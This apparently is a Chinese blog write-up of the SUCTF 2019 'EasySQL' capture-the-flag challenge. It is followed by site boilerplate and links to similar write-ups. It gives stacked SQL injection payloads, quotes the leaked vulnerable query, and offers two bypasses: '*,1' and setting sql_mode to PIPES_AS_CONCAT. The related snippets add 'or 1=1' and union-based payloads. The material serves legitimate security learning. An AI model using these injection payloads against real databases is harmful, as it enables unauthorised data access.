BUUCTF[SUCTF 2019]EasySQL

最新推荐文章于 2024-05-01 08:52:06 发布
最新推荐文章于 2024-05-01 08:52:06 发布
阅读量180 收藏
点赞数
分类专栏: CTF日记 文章标签: 数据库 sql 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45253622/article/details/116431271
版权

是一道SQL注入题型。

三种回显:

输入数字:

输入英文:

输入相关注入字符:

尝试了堆叠注入:

1;show databases; #

成功!

1;show tables;#

好像离答案越来越进了。

试试

1;select * from Flag; #

经测试,发现from flag 被过滤掉了。

比赛的时候源码泄露了:

select $_GET['query'] || flag from flag

解法1:

payload:

*,1

查询语句:

select *,1||flag from Flag

解法2:

膜拜大佬:

1;set sql_mode=PIPES_AS_CONCAT;select 1

解析:

  • 在oracle中缺省支持通过 ‘ || ’ 来实现字符串拼接。
  • 但在mysql中缺省不支持。需要调整mysql 的sql_mode。(模式:pipes_as_concat 来实现oracle的一些功能)

感觉不知道源码确实做不出来。

 

carefree798
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里注意表名为数字的要加反引号 “ 注:在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTFEasySQL [SUCTF 2019]
金 帛的博客
04-18 2820
BUUCTF的WP
2024年最新Buuctf-Web-[极客大挑战 2024]EasySQL 1 题解及思路总结
最新发布
2401_84302369的博客
05-01 393
此时跳转到check.php页面,得到结果。可知此页面与数据库产生交互。
sql_mode详解(超详细,亲测有效)
热门推荐
lky_for_lucky的博客
11-27 4万+
写在前面:处理MySQL数据库工作中遇到关于sql_mode的情况,特学习记录一下 1.sql_mode sql_mode是一组语法校验规则 2.查询sql_mode ①命令:select @@GLOBAL.sql_mode或者select @@SESSION.sql_mode 例如:②查看my.conf配置文件 例如:3.设置sql_mode ①命令:SET GLOBAL sql_mode=‘mode’;或者SET SESSION sql_mode=‘mode’;(mode替换为实际配置)。 ②修改my.
buuctf(EasySQL)
qq_75005708的博客
04-12 230
发现过滤了flag,看了其它的wp,这道题是内部查询语句,想让||不是逻辑或,用sql_mode去转换它,设置。sql_mode它定义了 MySQL 应支持的 SQL 语法,以及应该在数据上执行何种确认检查。还有就是这个模式下进行查询的时候,使用字母连接会报错,使用数字连接才会查询出数据,因为这个。然后我们接着查 1;回显为1,我们接着查看表 1;2.我们查看数据库 1;0就没有什么回显,然后我们去看看源代码。也只有看出post,其它也没有什么。回显是1,我们再看看0。然后我们先输入1看看。
BUUCTF——[SUCTF2019]EasySQL
weixin_62248541的博客
11-28 331
BUUCTF——[SUCTF2019]EasySQL
Buuctf-Web-[极客大挑战 2019]EasySQL 1 题解及思路总结
m0_62239233的博客
09-16 7646
SQL注入。
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
BUUCTF【Web】EasySQL
qq_70434663的博客
03-05 389
进入靶场后,
Buuctf web [SUCTF 2019]EasySQL
m0_61903191的博客
09-13 1114
又是一道考察sql注入的题。
BUUCTF[极客大挑战 2019] EasySQL 1
m0_75178803的博客
06-12 3963
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [极客大挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
buuctf easysql
hintll的博客
05-31 1607
[极客大挑战 2019]EasySQL 今天开始做buuctf上的web题 先看这题 打开链接后是一个登陆界面 首先想到的是弱口令试一下 admin admin admin 123 …… 都不行 然后考虑用bp爆破一下试试 但是这里有两个爆破的位置,所需要的时间比较长 所以应该不大概率的会是爆破 那么就只能考虑sql注入 对于有username和password的注入口 一般情况是在第一个username的地方注入然后将后面的password用#注释掉 先用普通的万能sql语句试一下 斜体样式 结果就直接
ctf(EasySQL)
Glacier_Mount的博客
10-07 585
查询语句的简单猜测
BUUCTF [SUCTF 2019] EasySQL
Senimo
03-30 2108
BUUCTF [SUCTF 2019] EasySQL Web writeup 启动靶机,打开页面: 根据题目判断是SQL注入,判断注入类型: 1;show databases; 最终判断为堆叠注入,查看当前表名: 1;show tables; 得到当前表名为Flag,多次注入无果,查看writeup存在源码泄露:index.php.swp,本环境无泄露 <?php se...
BUUCTF-EasySQL(sql注入题目)
m0_74167420的博客
03-10 422
为注释符,因而传入后台的是 select * from table_name where username='1' or 1=1 (因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag),则可返回真值。4、在该题目中,如果不匹配数据库也能返回真值那么就能绕过验证登录(万能用户名)。一般的,库验证登录注册查询数据会用到以下的句型,如果用户与密码匹配正确则返回。因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag。1、万能用户名/密码。2、在该题目中使用,
[SWPUCTF 2021 新生赛]easy_sql做题过程
heliar的博客
01-27 276
wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+查询表。wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段。查看得知回显为wllm,试输入?
BUUCTF-[SUCTF 2019]EasySQL1
09-12
BUUCTF-[SUCTF 2019]EasySQL1 是一个关于SQL注入的题目。根据引用和引用的内容,我们可以得知,原始的查询语句是 $sql = "select ".$_POST[query]."|| flag from Flag" ,在这个语句中,用户的输入被直接拼接到了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

carefree798

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值